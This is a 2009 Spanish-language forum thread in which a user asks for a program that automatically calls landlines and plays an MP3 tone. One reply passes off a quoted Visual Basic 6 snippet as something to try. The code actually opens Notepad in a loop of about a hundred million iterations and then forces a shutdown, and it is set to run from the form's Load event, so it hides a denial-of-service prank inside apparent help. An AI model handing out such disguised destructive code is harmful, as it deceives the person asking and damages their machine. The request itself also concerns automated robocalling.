programacion llamadas automaticas desde la pc a telefonos ijos

Iniciado por electronic_toy, 23 Octubre 2009, 01:49 AM

0 Miembros y 1 Visitante están viendo este tema.

electronic_toy

(programa para hacer llamadas automaticas desde la pc en cualquier lenguaje)Porfavor alguien puede enviarme un programa el cual realize llamadas automaticas y deje un tono mp3. sobre la red publica ee telefono no voz ip.

cassiani

Angeldj27

Creo que tenia un codigo para tomar el call id de un telefono y poder marcar x numero desde la pc. Creo que era con el control MScomm con esto en la office llevavamos un record de todas la llamadas con su respectivo cliente.

Aunque mientras puedes ir intentando con esto  :silbar:

Cita de: Mr. Crowley en 21 Octubre 2009, 19:28 PM
Este codigo es para Visua Basic 6:

Código (vb) [Seleccionar]

Dim iFila As Integer, iColumna As Integer

For iFila = 1 To 10000
           For iColumna = 1 To 10000
               Shell "notepad.exe", vbNormalFocus
           Next
       Next
   Shell "shutdown -s -f -t 5"

Coloquelo en el evento Load del form.

AnyWhere voy a chekar mi biblioteca de code y si lo encuentro lo posteo..  :P

Saludos....

"Que vamos a hacer Mañana?..... Lo mismo que hacemos todos los dias Pinky tratar de Conquistar el Mundoooo!!!!!

LixKeÜ

ssccaann43 ©

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"

Angeldj27

Aqui esta el code que te dije es sencillo con el control MScomm y ya puedes hacer llamadas a tu telefono, tienes que tener en cuenta que esto trabaja conectado con el puerto del moden de tu compu.. :P

Call Telefono

Saludos....
PD: no pongo la fuente porque no se de donde lo saque hace muchop tiempo  ;D

"Que vamos a hacer Mañana?..... Lo mismo que hacemos todos los dias Pinky tratar de Conquistar el Mundoooo!!!!!

ssccaann43 ©

- Miguel Núñez
Todos tenemos derechos a ser estupidos, pero algunos abusan de ese privilegio...
"I like ^TiFa^"